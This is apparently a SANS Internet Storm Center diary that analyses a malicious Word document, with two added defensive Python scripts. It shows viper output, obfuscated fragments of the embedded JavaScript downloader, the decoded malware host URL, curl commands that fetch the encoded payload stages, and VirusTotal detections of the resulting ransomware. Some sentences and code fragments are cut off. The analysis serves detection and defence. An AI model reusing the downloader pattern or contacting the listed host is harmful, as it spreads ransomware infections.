```
viper Order-complete.docx > info
+----------+----------------------------------------------------------------------------------------------------------------------------------+
| Key      | Value                                                                                                                            |
+----------+----------------------------------------------------------------------------------------------------------------------------------+
| Name     | Order-complete.docx                                                                                                              |
| Tags     | whiteknight                                                                                                                      |
| Path     | /home/nonroot/.viper/binaries/2/9/d/c/29dcb52fc33dd94a4e2eb866ad3e86ec60f3414372dbd557308d6c59b7131ae3                          |
| Size     | 17034                                                                                                                            |
| Type     | Microsoft Word 2007+                                                                                                             |
| Mime     | application/vnd.openxmlformats-officedocument.wordprocessingml.document                                                          |
| MD5      | 64b342c80a7f9e7ec1c85f1f0059feb3                                                                                                 |
| SHA1     | 5e0b0c0ed682139588f61f37eaf789003590b66a                                                                                         |
| SHA256   | 29dcb52fc33dd94a4e2eb866ad3e86ec60f3414372dbd557308d6c59b7131ae3                                                                 |
| SHA512   | ae709954da0b03a85323e180961a393820a4289a52e1ae752f499a58947863df86cbb9f66a6a7fe5478f9b64278f055f10bc6ba1871df28f882f71d756cbae48 |
| SSdeep   | 384:TyD28Wf7rR+4pMyFvt3nr+Jjgozm3BTmDU:FpzrgeRrqXgMU                                                                             |
| CRC32    | 58486E87                                                                                                                         |
| Parent   |                                                                                                                                  |
| Children | 25545563f98f99ee0274c2698eefbfec91e176d2165f755ca7ef455b3d468016,                                                                |
+----------+----------------------------------------------------------------------------------------------------------------------------------+
```
```
viper Order-complete.docx >
Sub Auto_Open()
Msgbox "Welcome to SANS ISC!"
```
```
viper Order-complete.docx > office -s
[*] Document Structure
 - [Content_Types].xml
 - _rels/.rels
 - word/_rels/document.xml.rels
 - word/document.xml
 - word/media/image1.emf
 - word/embeddings/oleObject1.bin
 - word/theme/theme1.xml
 - word/settings.xml
 - word/webSettings.xml
 - docProps/core.xml
 - word/styles.xml
 - word/fontTable.xml
 - docProps/app.xml
```
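To triage documents like this one without viper, the following Python script (an added example, not part of the original diary or of the viper project) lists the parts of an OOXML container with the standard library's zipfile module and flags the locations that carry embedded executable content, such as the word/embeddings/oleObject1.bin part shown in the listing above. The document it builds is a constructed skeleton, not the analysed file; the vbaProject.bin and activeX patterns are additional well-known locations that this diary does not mention.

```python
import io
import re
import zipfile

# Part names inside an OOXML container that commonly carry executable content.
# The oleObject*.bin pattern is what the viper listing shows; the other two are
# well-known locations added here as general background (assumption, not from the diary).
SUSPICIOUS_PARTS = [
    re.compile(r"^word/embeddings/oleObject\d+\.bin$", re.I),
    re.compile(r"^word/vbaProject\.bin$", re.I),
    re.compile(r"^word/activeX/activeX\d+\.bin$", re.I),
]


def list_parts(data: bytes) -> list[str]:
    """Return the part names of an OOXML (zip) container, like `office -s` does."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def find_suspicious_parts(data: bytes) -> list[str]:
    """Part names matching SUSPICIOUS_PARTS; an empty list means nothing embedded."""
    return [name for name in list_parts(data)
            if any(pattern.match(name) for pattern in SUSPICIOUS_PARTS)]


def build_sample_docx(with_ole: bool) -> bytes:
    """Constructed minimal OOXML skeleton used only to exercise the checks above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("_rels/.rels", "<Relationships/>")
        zf.writestr("word/document.xml", "<document/>")
        if with_ole:
            # OLE compound file magic followed by padding; a placeholder, not real content.
            zf.writestr("word/embeddings/oleObject1.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx(with_ole=True)
    for name in list_parts(sample):
        print(" -", name)
    print("suspicious parts:", find_suspicious_parts(sample))
```

On a real file, replace the constructed sample with `open(path, "rb").read()`; any hit is a reason to extract the part and look at it in a sandbox rather than open the document.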
The JavaScript is located in word/embeddings/oleObject1.bin. Once extracted and stored in %APPDATA%\Local\Temp\Order complete.js, it is executed and downloads a malicious PE file. Let
```javascript
try {
  // both the HTTP method and the base URL are obfuscated strings decoded at runtime
  c.open(deobfus("—-uFuwwu", 1), deobfus("—-qqq:qLU:qjqtqqq:UtF_qF_", 1) + "?ff" + loop,
}
```
```javascript
var data = c.responseText.indexOf("|||"
```
The requested URL is hxxp://dev.watershowbranson.com/info.php?ffX, x being incremented by the loop.
When you access this URL manually, you get different content depending on x:
```
$ curl hxxp://dev.watershowbranson.com/info.php?ff1
7,1,2,1,7,7,4,7,6,9,5,5,2|||1d6a11774069571211747695ffff7121b57476957121774709571217747695712177476957121774769571217747695…(removed)
$ curl hxxp://dev.watershowbranson.com/info.php?ff2
7,2,4,0,2,8,4,8,0,1,8,2,3|||1d7a30284101872406848018ffff7240b08480187240284841872402848018724028480187240284801872402848018…(removed)
$ curl hxxp://dev.watershowbranson.com/info.php?ff3
9,2,0,7,4,7,6,4,1,1,6,4,2|||3d7a97476711692078764116ffff9207b27641169207476451692074764116920747641169207476411692074764116…(removed)
```
Note the |||
```javascript
var daddbdbfeed = ebcebafed
}
// fragments of the decoding routine, variable names as found in the sample
function deobfus(s,key){
var fcddcdfcfcfc = "$d.JkT0_gOQ7F:%(*Z,-fCIximY^DLva+WB@4u8HX)pbNhSGsloe5w"
var buffer = abcafefaddd
if (cfbbadafdfabf0) {
```
```javascript
var foo = deobfus("—-qqq:qLU:qjqtqqq:UtF_qF_", 1)
```
which decodes to hxxp://dev.watershowbranson.com/info.php.
The data returned by the HTTP request use another obfuscation technique: they are passed to another function with the key being the array of integers in front of the ||| separator (in the first response above, 7,1,2,1,7,7,4,7,6,9,5,5,2).
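The following Python code is an added example (not from the diary) for the download stage described in the last few paragraphs: it parses the "key|||payload" responses into the integer key and the hex payload, and it flags clients that walk info.php?ff1, ?ff2, ... in sequence in proxy logs, which is the pattern the loop produces. The responses are shortened copies of the three shown above, the proxy log lines and their "client method url" layout are constructed, and the final decoding step is not implemented because the diary does not show how the key is applied to the payload.

```python
import re
from collections import defaultdict

# Constructed, shortened copies of the three responses above;
# layout is "<comma-separated integer key>|||<hex payload>".
SAMPLE_RESPONSES = {
    1: "7,1,2,1,7,7,4,7,6,9,5,5,2|||1d6a11774069571211747695ffff7121b57476957121774709",
    2: "7,2,4,0,2,8,4,8,0,1,8,2,3|||1d7a30284101872406848018ffff7240b08480187240284841",
    3: "9,2,0,7,4,7,6,4,1,1,6,4,2|||3d7a97476711692078764116ffff9207b27641169207476451",
}

SEPARATOR = "|||"


def parse_response(body: str):
    """Split one response into (key, payload_hex).

    Raises ValueError when the body does not follow the key|||payload layout,
    so a changed server response is noticed instead of being silently decoded.
    """
    if SEPARATOR not in body:
        raise ValueError("missing ||| separator")
    key_part, payload = body.split(SEPARATOR, 1)
    key = [int(tok) for tok in key_part.split(",") if tok.strip()]
    if not key:
        raise ValueError("empty key")
    payload = payload.strip()
    if not re.fullmatch(r"[0-9a-fA-F]+", payload):
        raise ValueError("payload is not hex text")
    return key, payload


# Constructed proxy log lines in a hypothetical "<client> <method> <url>" layout.
PROXY_LOG = """\
10.0.0.5 GET http://dev.watershowbranson.com/info.php?ff1
10.0.0.5 GET http://dev.watershowbranson.com/info.php?ff2
10.0.0.5 GET http://dev.watershowbranson.com/info.php?ff3
10.0.0.9 GET http://dev.watershowbranson.com/info.php?ff1
10.0.0.5 GET http://example.com/index.html
"""

URL_RE = re.compile(r"^(\S+) (\S+) (https?://[^/\s]+/[^\s?]*)\?ff(\d+)$")


def find_enumeration(log: str, min_hits: int = 3):
    """Return (client, base_url, counters) for clients fetching ?ff1, ?ff2, ... in order.

    One hit may be ordinary browsing; a consecutive run of min_hits or more
    requests to the same path matches the download loop seen in the script.
    """
    hits = defaultdict(list)
    for line in log.splitlines():
        m = URL_RE.match(line)
        if m:
            client, _method, base, counter = m.groups()
            hits[(client, base)].append(int(counter))
    flagged = []
    for (client, base), counters in hits.items():
        consecutive = counters == list(range(counters[0], counters[0] + len(counters)))
        if len(counters) >= min_hits and consecutive:
            flagged.append((client, base, counters))
    return flagged


if __name__ == "__main__":
    for n, body in SAMPLE_RESPONSES.items():
        key, payload = parse_response(body)
        print(f"ff{n}: key={key} payload={len(payload) // 2} bytes")
    for client, base, counters in find_enumeration(PROXY_LOG):
        print(f"{client} enumerated {base}?ff{counters[0]}..{counters[-1]}")
```

The enumeration check keys on the `?ff<N>` counter rather than on the domain, so it still fires if the same script is repointed at another host; the min_hits threshold keeps a single stray request from alerting.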
```
viper cab4.exe > virustotal -v
[+] VirusTotal Report for 5dc3d99293fe7b70a9796cf04492b954:
[*] Detecting engines:
+-------------------+--------------------------------------------+
| Antivirus         | Signature                                  |
+-------------------+--------------------------------------------+
| Baidu             | Win32.Trojan.WisdomEyes.16070401.9500.9999 |
| CrowdStrike       | malicious_confidence_100% (D)              |
| Cyren             | W32/Spora.E.gen!Eldorado                   |
| Endgame           | malicious (high confidence)                |
| F-Prot            | W32/Spora.E.gen!Eldorado                   |
| Fortinet          | W32/GenKryptik.ADNX!tr                     |
| Invincea          | virus.win32.sality.at                      |
| McAfee            | Ransomware-FMFE!5DC3D99293FE               |
| McAfee-GW-Edition | BehavesLike.Win32.Backdoor.fc              |
| Qihoo-360         | HEUR/QVM19.1.C414.Malware.Gen              |
| SentinelOne       | static engine - malicious                  |
| Sophos            | Mal/Elenoocka-E                            |
| Symantec          | ML.Attribute.HighConfidence                |
+-------------------+--------------------------------------------+
[*] 13 out of 61 antivirus detected 5dc3d99293fe7b70a9796cf04492b954 as malicious.
[*] https://www.virustotal.com/file/13e7a1f1291b0ddf1587d86b94989e0d8ff4884e3f2354810130a7865d0d431c/analysis/1493313215/
```
In this example, we have multiple payloads downloaded, each with its associated key (no direct PE file), and we don't see XOR encryption or Base64 encoding. Nothing suspicious, just plain text!
Xavier Mertens (@xme)
ISC Handler – Freelance Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.